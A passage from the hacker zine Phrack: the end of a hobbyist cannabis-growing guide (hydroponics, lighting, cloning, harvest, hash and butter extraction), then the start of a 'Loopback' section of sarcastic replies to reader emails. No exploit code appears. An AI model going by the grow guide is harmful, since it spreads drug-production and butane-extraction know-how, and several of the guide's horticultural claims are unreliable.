fills the space in the ground, and so soil must dry enough so that the
roots can have air to breathe.

Cannabis has two main kinds of roots. There are the taproots which can grow
very large and persist through dryness, and there are the feeder hairs.
Feeder hairs will not survive very long without water, but since the roots
need air to breathe the soil must dry out enough between waterings. Thus,
it is important to let soil dry enough so it is not wet but still retains
enough moisture to keep the feeder hairs alive. If they die, they must grow
back before the plant can begin absorbing more nutrients. An easy way to
tell if the soil is properly dry is if the color is still dark (not a
lighter brown as when the dirt is "bone-dry") but the soil does not stay
clumped together as it does when wet.

Plants require three macronutrients to survive: N-P-K, or Nitrogen
(Nitrates), Phosphorus (Phosphates), and Potassium (Potash). Nitrogen is
primarily responsible for the green color in vegetative matter. It is not
as important in fruits and flowers. Phosphorus is needed for root growth
and is also the primary nutrient for fruits and flowers. Potassium is used
throughout the plant to provide support; more Potassium means stronger,
stiffer stems and branches which provide better support for dense buds.


0x01: Environment

Although cannabis grows in pretty much any condition (it is a weed, after
all), optimal conditions produce optimal growth rates. Certain strains may
be more picky than others, but generally you want the following:

Humidity
 Cloning: 90-100%
 Vegging: 50-80%
 Flowering: 40-50%

Temperature should always be 68-75F (20-24C). Lower temps increase
humidity, and higher temps reduce humidity. Plants drink through their
leaves as well as their roots, and they need humidity to do this. They also
transpire through their leaves when temperatures are too high. Keep this in
mind when checking your levels and diagnosing your plants. For instance, if
the environment's been hotter than ideal and the air is dry, a small
watering in between regular waterings may be necessary to protect the roots
near the topsoil and prevent the plant from going into shock.

Air flow is very important. Basically you want to see the leaves moving at
all times. Proper air flow does two things: it moves the air right around
the leaves so the plant always has access to CO2, and the continuous leaf
movement causes the plant to react and grow stronger stems which you need
to support those massively dense buds you wanna grow. Too much airflow
isn't a big deal as long as the plants aren't falling over. Technically,
moving air will reduce air pressure and thus temperature will drop
slightly, so if heat is a problem for you consider keeping your fan on a
higher setting. But the more air flow, the more the plants transpire, and
the more water they'll need.


0x02: Container

Cannabis needs a proper container to provide optimal root growth. In shape,
the best container is wider than it is tall. If growing outdoors, a raised
bed of good soil does wonders. Indoors, wide pots or trays work very well.
You'll need to decide if you want to grow in soil or a hydroponic medium.
There are pros and cons to both. Soil with compost is ideal for outdoor
organic growing -- after preparation nature helps keep the roots healthy,
and with a good compost mix most of the time plain water is all that's
needed. If growing in pots, soil is still a good choice, but you will
definitely have to supplement the water with additional nutrients, or you
can use dry fertilizers that you work into the topsoil.

Indoor growing is much different than outdoor, and growing hydroponically
adds a-whole-nother set of variables. If you're lazy, you have two options:
grow in soil (soil is very forgiving), or build an automated setup. An
automated setup is one that takes care of watering for you, so all you need
to do is regular checkups, trimming, and checking on your reservoir.  I'll
go into detail about different hydroponic setups later on.


0x03: Water

Yes, a whole section on water, albeit a short one. Water temperature should
be a little less than air temperature, although the roots will tolerate
pretty cold water. Never give your plants water that's less than 50F (10C);
you'll risk shocking the roots and stunting growth for a few days.

Water should be clean of excess salts, especially chlorine and chloramines.
Soil gardens will tolerate the chlorines much better than hydro, but you
should really get a water filter. A carbon filter is usually fine, but if
your water source is really bad you might want to consider Reverse-Osmosis.
RO filters are expensive, but they also reduce the conductivity of the
water to the lowest possible levels, allowing you to add more nutrients
without burning the roots. Carbon filters are pretty cheap, and you could
even use a regular drinking water filter.


0x04: Nutes

I do love organic; there's nothing quite like the taste of organically
grown buds, but I do find that synthetic nutrients give amazing results.
If you're not growing for personal use, synthetics are cheaper and can give
very high yields. Either way, I'd recommend using a premade blend made by a
name-brand company -- when you're starting out it's just not worth trying
to play chemist, just get the kit. I use liquid nutrients for both hydro
and soil, but dry feeds will work in soil and any non-recirculating hydro
setup (e.g. feed and drain in coco). Liquid nutrients are designed to be
instantly accessible by the plants, whereas dry feeds are usually
time-release.

Here are some rough empirical NPKs:
Cloning: 1-3-4
Vegging: 3-2-4
Flowering: 1-4-5

Aside from Nitrogen, Phosphates, and Potash, plants also need
micronutrients. Iron, Calcium, and Magnesium are at the top, with still
many others required for proper growth. Most organic mixes will have these
even though they won't specify on the bottle, but if you're growing with
synthetics you will have to supplement. Molasses has Fe, Ca, and Mg, and
the sugar content helps both feed microbials and rinse out the growing
medium. Various Vitamin B-1 mixes will have most necessary micronutrients.
Cal-Mag supplements are good too, but be aware when using in conjunction
with molasses so you don't overfeed.

In general, I recommend starting with less than half of the listed usage on
the nutrient containers and then increasing as you see fit. It's a lot
easier to see that your plants' leaves are a lighter green than you would
want and then to increase the Veg mix than to use too much and burn your
plants and have to start all over. If growing in soil, try starting at a
quarter-strength and using it with every watering. Increase as necessary to
compensate for light color and plant size.


0x05: Conductivity and pH

Soil/medium pH and water pH are measured differently, but as long as you
regulate the water pH there's no reason to worry about the soil. If you can
afford it, I highly recommend getting a pH/Conductivity meter; some also
measure PPM (parts per million), though it's usually a conversion from
conductivity (measured in milliSiemens). I don't even pay attention to the
usage on the nutrient bottle anymore, but I fill my reservoir according to
the conductivity. I find it to be much more accurate than measuring the
volume of water in gallons and using measuring cups for nutrients.

Required pH will depend entirely on your medium. In pure hydro/aero setups,
this is 5.6-5.8 for veg and 5.8-6.0 for flowering. In coco coir, this is a
bit higher: 6.0-6.2 for veg and 6.2-6.5 for flowering. In soil, it really
depends on what's in the mix, but it usually ranges in 6.5-6.8 for veg and
6.8-7.0 for flowering. Cloning should be in between the values for veg and
flowering (5.8 for hydro, 6.2 for coco, and 6.8 for soil).

pH mostly affects the nutrients that are available for the roots to absorb.
The lower ranges increase nitrogen uptake, and the higher ranges increase
phosphates. Since nitrogen is more important for veg and phosphate for
flowering, this explains why the ranges are different for each phase. If pH
varies by a point or two, it's not a big deal, but too strong in either
direction can cause root-burn as well as deficiencies in both macro and
micronutrients.

Conductivity requirements depend on the age/size of the plant. I suggest
starting with these maximums and steadily increasing for larger containers
so long as no signs of problems occur:

For soil/hydro:
 Cloning: 0.8/1.2 mS
 Vegging: 1.6/2.0 mS (containers up to 2 gallons)
 Flowering: 2.4/3.0 mS (containers up to 5 gallons)

In general, conductivity >3.0 mS can be dangerous, so above that range only
increase once/week and only 0.1-0.2 mS at a time.


0x06: Hydroponics

Hydro is awesome. Plants have the ability to grow continuously and at a
very rapid pace, but they need extra care, and problems with nutrients or
pH often occur so quickly that by the time you realize there's a problem
it's usually too late. For first-timers, I'd recommend coco coir. If you're
ambitious, consider building your own aeroponic system. In general, there
are two types of systems: recirculating, and drain-to-waste. I'll list each
medium and give some details about which system is appropriate. For
recirculating, you'll want to drain and change your reservoir at least once
a week in addition to topping it off regularly, whereas if using a
drain-to-waste system only topping off is necessary.

Coco coir:
Coco coir is a part of the coconut husk that by itself can take years to
break down, hence its designation as a hydroponic medium. It's commonly
used as bedding for worms. It's highly absorbent and expands to sometimes
five times its dry volume when wet. It also holds air very well. Coco coir
is nice because it's very difficult to over-water your plants with it since
it holds so much air, and the shrinking in between waterings adds
additional air to the medium.  Drain-to-waste is best for coco because bits
of the medium will also drain out, and you don't want these clogging up
your pump or lines. Depending on the size of the container and plants, coco
requires 1-3 feedings/day.

Rockwool:
Rockwool is woven fibers of rock made by Grodan. Rockwool is very
absorbent, and it's easy to see when it is drying up. Like coco, rockwool
is very porous and holds air very well. I prefer rockwool for cloning.  Ebb
and flow (flood and drain, recirculating) or drain-to-waste both work well
with rockwool. Fast growing plants may require up to 5-6 waterings/day
depending on the size of medium. Timers come in handy here. For ebb and
flow, flood for 10-15 minutes, then drain. For drain-to-waste, feed as
needed, allowing 5-10% of the water feed to drain, ensuring complete
saturation of the medium.

Hydroton, Perlite, or other Pebbles:
Hydroton is a manufactured expanded-clay medium. Perlite is a volcanic
glass/rock, also expanded, and very porous. Both are better than filling a
container with rocks/pebbles, although you could do that if you're really
trying to save money. Hydroton and perlite do hold some water, but they
drain very quickly and so should not be left without water for an extended
period of time.
Ebb and flow or continuous drip work well here. Drain-to-waste is very
inefficient since the medium doesn't hold water for very long, and so very
accurate timings would be needed to prevent excessive waste. If using a
continuous drip, consider aerating the reservoir with an air pump to ensure
roots have access to oxygen. For ebb and flow, flood at least 1-2 times per
hour with no more than 15 minutes of dry time.

Aeroponic:
Aeroponic growing is sweet. There's little-to-no chance of overwatering or
underwatering (unless your pump breaks) as the roots always have access to
water, nutrients, and air. For this, you'll need to construct a sprayer
assembly inside a reservoir. Rubbermaid containers are cheap and work well.
Cut 2" holes in the lid (or whatever size gasket you have) and fill the
holes with cylindrical foam gaskets to hold the plants. Plant roots hang
down freely into the reservoir. Construct the sprayer assembly using PVC
piping and small 180- and 360-degree sprayers depending on placement.  The
assembly should be as short as possible but have at least 2-3 inches above
the pump and below the sprayers at the top. Use a submersible pump, and
fill the reservoir to above the pump but below the sprayers. You will need
an NFT (Nutrient Film Technique) style timer for the pump. These typically
operate on cycles of 1 minute on and 4 minutes off or 3 minutes on and 5
minutes off. I've seen cheap adjustable ones on eBay. You can also make one
yourself with an Arduino and a relay pretty easily. Just make sure that the
cycle allows for time in between sprayings to provide the roots access to
air. An air pump here also works well.

Deep Water Culture:
DWC is simple, easy, and efficient. It's basically an aeroponic system but
with a much deeper reservoir, allowing the roots to grow down into the
nutrient solution. A sprayer system similar to the aeroponic one described
above can be used, or a top-drip works as well. For a top-drip, fill a pot
with Hydroton or another medium, and set the pump to continuously pump feed
from the reservoir underneath to the pot on top. An aerator for the
nutrient solution is necessary here so that roots hanging down into the
solution have access to air.

Aquaponic:
When I first read about this I was blown away. Aquaponic combines hydro
with an aquarium. Basically, you have a large reservoir with a DWC setup,
but additionally you have fish living inside as well. The fish and plants
eat each other's waste (just like in nature!), and they both feed on fish
meal which is one of the most common organic plant foods. Guppies are
usually the best choice for fish since they're cheap and reproduce quickly,
although any freshwater fish will work.


0x07: Light

Light is arguably the most important factor in growing. Typically it is the
most limiting factor. There are many different types of lights, and each
has its own benefits. Halogen lights are most common in professional grows,
fluorescents are cheap and efficient, and LEDs are gaining popularity.
Here's some info on each:

Good ol' incandescents:
These provide light, they sure do, but they also provide heat. They're best
used as supplemental light when you need the added heat as well, otherwise
just go with a fluorescent.

Fluorescents:
Fluorescents come in many sizes, shapes, and spectrums. Spectrum is rated
by color temperature in Kelvins. A 6500K light is usually recommended as it
provides the closest spectrum to the Sun's white light. In general, the
higher the K, the better. Fluorescents are great for all phases of growth,
but they're best suited for clones, mothers, and vegetative plants when you
have an HPS available for flowering. Even so, they're always great to
consider as supplementals since they're so cheap and efficient.

Metal-Halides:
MH Halogens are extremely effective for the vegetative phase. They work for
flowering as well, but are not as effective as HPS lights. A 400-watt MH
can cover a 3x3ft area, 600-watt covers 4x4', and 1000-watt covers 6x6'.
Of course, additional light is nice.

High-Pressure Sodium:
HPS lights are best for flowering. They have a spectrum more concentrated
in the red/yellow end which plants tend to absorb more during the autumn
season (when flowering). In every test I've ever seen, HPS lights
outperform all other lights in flowering production, watt for watt (or
lumen-equivalent in the case of LEDs and fluorescents). HPS lights also
generate a lot of heat, so keep that in consideration.

LEDs:
LED lights are extremely efficient, but they're also expensive. In the long
run, they're worth it, but they can take a few cycles to pay themselves
off. LEDs come in combinations of red and blue (more red for flowering),
and sometimes other colors are added as well. If space permits, I'd still
recommend using an HPS along with LEDs for flowering, but LEDs are great
for the vegetative phase.

With all lights, the inverse-square law applies, meaning if you cut the
distance from light to plant in half, you quadruple the light received, and
vice versa, if you double the distance you quarter the light received. Too
much light can be a bad thing. Plants that are too small or do not have
enough water/nutrients to use will not be able to use all the light that
hits them and their leaves will burn. Also, there are areas close to the
lights that are called hotspots. These are areas where reflected light is
concentrated, and plants in these spots are more likely to burn since the
light there is very intense. The rule-of-thumb is use your hand: if it's
too hot for you, it's too hot for the plants.


0x08: Cloning

Cloning is the process of taking cuttings from a "mother" and allowing
these cuttings to root into plants of their own. In addition to your mother
plant, you'll need a sharp pair of snips, a humidity dome, cloning medium,
filtered water, cloning gel/powder (optional), nutrients (optional but
recommended), and a light that will be on 24-hours/day (a single
fluorescent is sufficient). Here is a step-by-step process:

Prepare your mothers by giving them plain water (along with a flushing
solution if you like, a bit of molasses works well) at least a day before
cutting clones. This helps flush out excess Nitrogen so that the clones can
root more quickly.

Prepare the cloning solution.  This can be plain water, but I like to add a
mix of flowering nutrients (better than vegging nutrients for rooting,
nitrogen is bad for cloning) and kelp and algae extracts. Balance the pH of
the solution according to the medium you're using, and thoroughly soak the
medium.  I use rockwool. Other alternatives are Groplugs, Coco, and soil.
Any growing medium can work, really. I also like to keep a pool of solution
in the bottom tray of the humidity dome to help keep the humidity high as
well as provide food for the plants once they root. You can even allow the
medium to soak for the first 3-4 days of cloning to help speed up root
growth, just be sure to drain it after that.

Cut the clones. I've cut both small and tall clones, and the small ones
work very well too. Leave at least 2" (about 5cm) of stem underneath the
highest leaves. You can trim leaves off to save space, if you want. This
allows you to pack more clones inside the dome. Otherwise, I like to leave
the leaves on (except for the bottom section that's inside the medium). You
can place the clone directly in the medium, or you can shave and split the
bottom. Splitting the bottom of the stem and shaving off the outer-layer of
the bottom of the stem increases the surface area of the cambium layer,
kind of like a stem cell layer. This is where the roots grow from. Exposing
more can increase the rooting time by a few days, but often you will get
much more vigorous root growth. I prefer this method.

Dip the stem tip in cloning gel/powder, if you're using it (I don't), then
plant the clones inside the medium, and cover the dome. If cutting many
clones, I like to keep the dome partially covered (for those already
planted) so they don't start wilting right away.

After they're all planted and the dome is covered, place the dome under a
light that will be on 24-hours/day. Clones need very little light to root,
so a single fluorescent is sufficient here, or just some ambient light that
will not be shut off.

Clones can take anywhere from 5-14 days to root depending on the factors
discussed above. I like to keep my clones rooting in the dome until their
root masses are about a foot long, though the plants will still be short.
This ensures the best chance of avoiding shock when transplanting as well
as fairly explosive growth within a couple days of transplanting.


0x09: Vegging

Once clones have rooted, the vegetative phase begins. Most strains require
at least 18 hours of light/day to prevent them from flowering, though some
may require more, up to 24 hours/day. This is the easiest phase to grow in
since the plants are vigorous and large enough to tolerate shock.

Transplant your clones into the medium of your choice, and begin feeding a
mild nutrient solution. For soil gardens, plain water can be used for the
first week. Increase the concentration of the nutrient solution over time
to accommodate the size of the plant. Consider transplanting to a larger
container after two weeks of continuous, vigorous growth.

Depending on your setup, you'll want a different target size of your veg
plants. A sea of green, for instance, requires many plants next to each
other so that they basically form a horizontal plane across their tops, but
if you're growing in a small closet with 2-3 plants then you'll probably
want them as big as they can fit.

There are different stress-techniques used to promote larger growth.
Topping is one of the most common. Topping entails cutting off the newest
growth of the highest node, generally without trimming much of the larger
leaf matter. Topping forces the plant's vascular system to merge at this
point, causing more growth nodes to be produced here at the top of the
plant. Topping is a preferred method because the top buds of each branch
are generally the largest, and more top nodes mean more top nugs.

Another technique used is bending. Bending entails taking the tallest
branch of the plant and bending it down and to the side, usually tying it
down with gardening wire or string. Bending exposes more of the lower nodes
to direct light, causing them to grow larger. It also allows more buds to
receive direct light, making it another preferred method by many growers.

Creasing and snapping branches are a form of "supercropping", and they
combine the benefits of topping and bending. The idea is to break the inner
part of a branch while keeping it attached to the plant. Like topping, this
causes a merging of the vascular system, and this section of branch later
on will grow into a nice bulge. And like bending, the top nodes are pushed
outward to allow more light to hit nodes underneath. It is usually best to
bandage the plant after supercropping until it has completely healed since
this technique can cause a good deal of damage to the plant if left
unattended. It's usually best to delay flowering for a couple of weeks
after supercropping to allow the plant to fully heal and build support for
those super dank buds it'll be growing.


0x0A: Flowering

Once your plant has reached the desired size, it's time for flowering.
Unless you're growing an autoflowering variety, the flowering cycle is
typically triggered by a change in nighttime length, and most often a
12-hour day/12-hour night cycle is used. Some plants will grow considerably
during the flowering phase, especially the African Sativas, so keep this in
mind; you don't want to trim the plant once it's in full flower production
as this causes considerable stress and can cause the female to produce some
seeds.

For the first couple weeks of flowering, convert about half of your
nutrient solution from the veg mix to the flower mix. Convert more to
flowering as time passes. After 2-3 weeks, a pure flowering mix should be
used. Once the mass of pistils have formed, increase the nutrient
concentration. Large, dense buds will develop, and some leaves may yellow
and drop. Toward the end of the cycle, pistils will change color (often
from white to orange/brown), and from here on consider flushing with plain
water. Flushing leaches leftover fertilizer from inside the plant, giving
it a much smoother burn. Plants that are harvested without flushing
typically will have harsh smoke, even after curing.

At the end of the flowering phase, the crystals on the buds, pistils,
leaves, and stems will first turn milky-white. After this, they begin to
brown. This is when they are ready to pick. Picking later will bring out
more of the Indica characteristics (more CBD/CBN), whereas picking earlier
will bring out more of the Sativa characteristics (more THC). Picking too
early, however, (before crystals have become milky-white) produces weak
buds, and often will just give you a headache when smoked.

If after flushing the crystals do not appear to change color, feed them
once more, with a full, strong solution, then continue flushing.
Additional buds will likely grow, and they will be ready soon after.


0x0B: Harvest

Harvest the plants by cutting at the base, then hang them upside-down (I
dare you to try hanging them right-side up....good luck) in a dark room to
dry. A small amount of airflow is necessary, so keep a fan on low but not
pointed directly at the plants. After at least one day of full darkness,
you can begin trimming. Trim off all the largest leaf first, leaving the
smaller, hashy leaves for manicuring later. If this trim does not have
crystals/hash on it, discard it, otherwise save for extracts.

Manicuring is a bit of a longer process. You can go the quick route, and
just trim the ends of the leaves sticking out like so many lazy-ass growers
do, or you can properly manicure your buds, making them look better and
preventing you from smoking all that leaf matter. To manicure, use a pair
of floral trimmers to reach in and cut the leaves at the base of the stem.
This is usually easier than holding the buds upside down since the leaves
are below the buds. It takes practice and patience to avoid clipping off
whole buds, but even if you do just save them along with the other
manicured buds. After the leaf is clipped off, remove excess stem.  If the
stems fold when you try to break them, the buds are not dry yet; place them
in a brown paper bag for further drying. Once they snap, place them in
glass jars for curing. Also, save all the trim from manicuring for making
extracts. You can place it in a ziploc bag and put it in the freezer until
you're ready to make extracts.

Check on the glass jars once a day. Open each jar, and take a whiff. You'll
notice over time how the smell changes. Check out the buds. Try snapping a
stem. If it folds, either put the buds back in a paper bag, or keep the jar
open a bit longer. For a quick, 2-week cure, keep jars open 15-60 minutes
per day depending on dryness. If buds are dry, don't leave the jar open too
long, but open it at least once a day to allow the air inside to exchange.

During the curing process, chemicals inside the buds break down, mainly
those that cause harsh smoke. The longer the cure, the smoother the smoke
is, but I can't say that anything longer than 8 weeks really makes a
difference. Once the buds smell like they have cured, try smoking it.
Continue the curing process until the smoke is smooth and clean.


0x0C: Extracts

Now here's the fun part. Personally, I like making kief, hash, and baked
goods. Butane extracts are also pretty easy. I won't go into detail on
those, but making a butane extractor with PVC and a lighter refill can is
simple, and there are plenty of guides available online.

If you want to make butter or oil for cooking, you can use kief or hash
you've already made and not worry about filtering, or you can use the trim
in its entirety. If using trim, fill a pot with the amount of butter or oil
you want to make. Add just enough water to the pot so that it won't splash
or boil over, but otherwise more water doesn't hurt. Mix it all together,
and add the trimmings. Simmer the mixture for a minimum of 2 hours and up
to 24 hours -- I definitely notice a difference between 2 and 24, but I
can't say where the threshold is in between. After it's done cooking,
transfer the mixture through a strainer into another pot or bowl, and place
this into the refrigerator. The oil or butter (along with the good stuff)
will rise to the top, and the water will sit at the bottom. Since THC and
the other chemicals are oil- but not water-soluble, none of it should be
lost in the water. If the oil hasn't solidified at all, placing it in the
freezer for a little while should do the trick (too long and the water will
freeze). Scoop out the oil or butter, and use for baking, or spread on
toast!

Making water hash is pretty easy. Get yourself a set of extract bags
(minimum 3) including at least either a 73-ish or 90-ish micron bag. In a
set of 3 the others should be around 25 microns and at least 180 microns.
Place each bag, smallest first, into a bucket, and fill the bucket with
ice-water. Add the trim, and mix for 15-20 minutes with a kitchen or paint
mixer. Let the mixture settle for about half an hour, then remove each bag
one at a time. The first will remove the trim, and others after will have
hash and/or contaminants, depending on how many bags you use. If the set
comes with a screen, use the screen to press the water out of each mass of
hash. Scrape the hash off and set aside to dry.

Even easier than water hash is what I like to call white-trash hash. What
comes out is really kief, but you can press the kief into hash if you want.
Procure a large container, like a storage bin for a shelf. One with fairly
high walls is good so it captures as much of the mess as possible. Take
your 73-micron bag, and put your trim inside. Fill the rest of the bag with
broken-up dry ice. Tie the bag off (hold it closed), and shake into the
container until all the glorious beauty falls out. You may want to split
into multiple sessions, the first being more pure and second-grade after
that, but I usually just shake until it looks like it's all out.  What you
end up with in the bag is a green, sloppy mush that you can go ahead and
discard. The bin, however, is now full of wonderful kief.  Smoke it now, or
save it for later. Press a chunk into hash between your palms, or put some
in a baggie in your shoe and walk on it until it turns into hash.


0x0D: Signs and Symptoms

I've saved the worst for last. Here are different signs and symptoms of
various problems you may encounter.

Perfect: The sign of perfection is perky plants, solid to deep-green
colored (but not too dark). Leaves point upward at a 40-60 degree angle and
toward the light. Daily growth is visible. Pistils are perky but not
crooked at the ends.

Over-watering: leaves will curl downward, with the middle section being the
highest, kind of like it's trying to be an umbrella. Wait as long as
possible before watering again, and make sure to provide at least a mild
nutrient solution especially if straight water was used at the previous
watering.

Under-watering: Can be similar to heat stress when it occurs frequently,
but otherwise the leaves will lose perkiness and wilt, lying beside the
stem and pointing downward. Pistils first show signs with crooked ends, and
soon after they shrivel and change color. Make sure to fully soak the
container after this occurs, the best way being a slow flow of water rather
than gushing out of a watering can.

Heat-stress: Leaves fold up and inward, especially at the edges. Fix by
moving the light further away or reducing the temperature. Supplement with
extra air flow and a small extra watering (straight water is usually best
for this to prevent nutrient burn when coupled with heat stress).

Nitrogen deficiency: Leaves yellow to light-green. Treat by increasing
concentration of veg mix.

Nitrogen toxicity: Leaves very dark green, later start burning. Treat by
reducing the concentration of veg mix.

Phosphorus toxicity: Leaves dark green (purple tint sometimes) and wilt,
curling downward. Treat by reducing the concentration of flowering mix.

Various toxicities, deficiencies, pH burn: Chlorosis (dying plant matter)
on various parts of leaves. Different styles signify different problems,
but overall consider what changes have been made recently. Check pH of
nutrient solution. Fix by flushing medium with a mild nutrient solution at
proper pH. Avoid using supplements, just use a basic nutrient mix for the
current phase. Treat a suspected deficiency with only a slight increase in
what you think is needed. More often than not micronutrient deficiencies
are only present when using synthetic nutrients and only when not using any
other supplements. Mild deficiencies are not likely to show visible
symptoms.

Bugs!  Many different bugs will want to eat your plants. Some of the most
annoying are aphids and spider mites. Insecticidal soap works well with
aphids, and neem oil works extremely well with spider mites. For aphids,
spray on site.  Most soaps take care of them well. Also consider removing
infected plant matter. For mites, spray thoroughly and afterward remove
leaves with noticeable spots since these 90%+ of the time have eggs. Neem
will kill the mites but not the eggs. Spray again 2-3 days later and again
a week after the first. Afterward, inspect daily and spray as needed.
Grasshoppers eat the leaves. Sorry Mr. Grasshopper, but you gotta die. Pick
them off and get rid of them however you choose.  Caterpillars eat
everything, especially the buds. Inspect dying bud matter for caterpillars,
and remove those found. Spray with a Bt solution -- it's a bacteria that
when eaten causes the caterpillars to stop eating.  These methods are all
organic (or available as organic). Use synthetic pesticides only in severe
cases, and only before buds begin forming. Both the insecticidal soap and
neem oil can be washed and rinsed off with regular soap at harvest if
necessary.

Mold!  Mold sucks. Bud mold is highly infective and destructive. Bud mold
is characterized by grey/black along the stem and spreads quickly. Remove
entire affected plants immediately. Place in quarantine until sure of the
diagnosis, then destroy any infected plants.  Powdery mildew is annoying
but treatable. It is easy to spot -- visible white spots with a powdery
look on top of leaves. Treat by spraying with a baking soda solution and
increasing air flow. Decrease humidity for up to a week after symptoms
disappear if possible.


0xFF - Fin

That concludes this guide. I hope you've enjoyed reading it, and I hope
you're now ready to grow some super ultra dank megabuds.


|=[ EOF ]=---------------------------------------------------------------=|


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x05 of 0x13

|=-----------------------------------------------------------------------=|
|=------------------------=[  L O O P B A C K  ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[  Phrack Staff  ]=--------------------------=|
|=-----------------------------------------------------------------------=|


    Hi there!

The least we could say is that p67 caught the attention of a lot of people.
We got very good feedback both IRL, on IRC and through the comments on
the website. Good. As you will soon find out, we had quite a bunch of
(un)interesting mails this year which we would like to share obviously ;>
Before going further, a quote from the last loopback is necessary:

                                 ---
We humbly apologize to all guys we never answered to neither by mail nor
through this phile because we suck at filtering our spam (this could
_absolutely_ not be a laziness issue, right?)
                                 ---

That said, we have to thank all the people that (un)voluntarily sent their
contributions, whatever these were.

As you will see, a polemic started with the release of the last scene phile
as several people felt a bit disappointed (to say the least) by the 
description of the gr33k scene.

So let's explain a few things about the context of its writing:
    - The writing itself is small and oriented because the authors didn't
    have the time to do better.
    - We (the phrack staff) are the ones who asked them for such a phile
    and being in a hurry we couldn't give more than a couple of weeks to
    the authors. Clearly they *SAVED* our sorry ass and they did it for
    you, the community. Sincere apologies of the staff if this was not good
    enough.
    - (Greek) people may argue that the description was not accurate itself
    but as you can remember, it was written with the idea of being
    completed in this release:


            Volume 0x0e, Issue 0x43, Phile #0x10 of 0x10
                                 ---
In this brief article we will attempt to give an overview of the current 
state of the Greek computer underground scene. However, since the strictly
underground scene in Greece is very small, we will also include some
information about other active IT security related groups and forums. There
is a going to be a second part to this article at a future issue in which 
we will present in detail the past of the underground Greek scene in all 
its gory glory.
                                 ---

And they kept their promise with the help of some notorious big shots
of the greek hacking scene.

To the bunch of losers/masturbating monkeys who are still complaining:

                                 /"\
                                |\./|
                                |   |
                                |   |
                                |>~<|
                                |   |
                             /'\|   |/'\..
                         /~\|   |   |   | \
                        |   =[@]=   |   |  \
                        |   |   |   |   |   \
                        | ~   ~   ~   ~ |`   )
                        |                   /
                         \                 /
                          \               /
                           \    _____    /
                            |--//''`\--|
                            | (( +==)) |
                            |--\_|_//--|


Don't worry, we published your side of the story as well. And now is time 
for our little ... hem ... group therapy session ;-)


                                    -- The Phrack Staff

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x00 - Phrack .VS. the social networks ]=--------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]

From: Unix Root <1161967623738704101@mail.orkut.com>
Subject: orkut - Unix Root wants you to join orkut!

Unix Root wants you to join orkut.

    [ Unix Root himself, seriously? ]

Join now!
http://www.orkut.co.in/Join.aspx?id=ZZZZZZZZZZZZZZ&mt=22

    [ id has been replaced to protect the innocent (us) ]


  * * *

What you can do on orkut:
  - CONNECT with friends and family using scraps and instant messaging
  - DISCOVER new people through friends of friends and communities
  - SHARE your videos, pictures, and passions all in one place

    [ Sounds like it would change my life. ]

Help Center: http://help.orkut.com/support/

    [ To tell you the truth, help won't be necessary at this point :> ]

                                    ---

From: ***** ***** <thehackernews@gmail.com>
Subject: Invitation to connect on LinkedIn

LinkedIn
------------


I'd like to add you to my professional network on LinkedIn.

- *****

    [ What if we do not intend to do business with you? ]

**** ****
Owner at The Hacker News
New Delhi Area, India

Confirm that you know **** *****
https://www.linkedin.com/e/xxxxxx-wwwwwwww-2h/isd/YYYYYYYYYYY/PPP_OOO/

--
(c) 2011, LinkedIn Corporation


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x01 - <?php include($teaMp0isoN) ?> ]=----------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Poison Blog <p0isonblog@ymail.com>
Subject: TeaMp0isoN: Issue 1

My first ever zine, read it and let me know what you think. hoping it gets
published in the next phrack magazine.

    [ Hem. So basically this is a new concept: publishing a zine inside
      another zine. And we even got 0day-hashes in the process. WIN/WIN ]

- TriCk


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x02 - The usual mails  ]=-----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


    [ Have you ever been curious about the kind of mail we are used to
      receive? Let's have a taste. ]

                                    ---

From: skywalker <oyyj07@gmail.com>
Subject: how can I get the source code

hello, I found some source code in phrack Magazine, but it is attach with
text mode, how can I get it?

    [ Download the paper in "text mode". Then comment everything inside
      that is not the code you want to compile and fire gcc.
      It might work. If it doesn't mail nikoletaki_87@yahoo.gr for help. ]

                                    ---

From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
Subject: Phrack issue 58

How can i get the binary-encryption.tar.gz
from the article Runtime binary encryption?

    [ You can't; it's encrypted. I think oyyj07@gmail.com has the password.
      You should get in touch with him. ]

                                    ---

From: stephane.camprasse@free.fr
Subject: edition 64 infected by OSX:Niqtana

Hello there,

tar.gz of the magazine number 64 appears to be infected:

http://www.sophos.com/en-us/threat-center/threat-analyses/
viruses-and-spyware/OSX~Niqtana-A/detailed-analysis.aspx

    [ Wow. Sounds like a serious issue. What should we do? ]

Kind Regards

Stephane Camprasse, CISSP

    [ At first we wanted to laugh, then we saw you are serious business. ]

                                    ---

From: Domenico ****** <jmimmo82@gmail.com>
Subject: Mailing Lists Phrack

Dear Phrack Staff

I would like to subscribe at mailing lists of Phrack but email
addresses provided by the site not exist.

    [ That's because there is no ML, dude. ]

What do you advise me?

    [ Well, keep looking. ]

Best Regards
Domenico *******

                                    ---

From: Robert Simmons <rsimmons0@gmail.com>
Subject: phrack via email

Do you have a mailing list that sends phrack out via email, or at least an
email reminder to go download it?

    [ We don't. What would be the point in a bloggo/twitto world where
      information spreads that fast? ]

Rob

                                    ---

From: Elias <thesaltysalmon@gmx.com>
Subject: How do i subscribe?

As the title says, how do i subscribe to Phrack?

    [ Since you're not polite we won't accept your subscription. Don't
      mail us again. Please. ]

                                    ---

From: William Mathis <scotti@uniss.it>
Subject: One paper can change everything!

    [ New submission???? :D ]

What do I mean? Of course the Diploma.

    [ 0wned. Deception is part of the game :-/ ]

It is no secret that the knowledge, skills and experience play a crucial
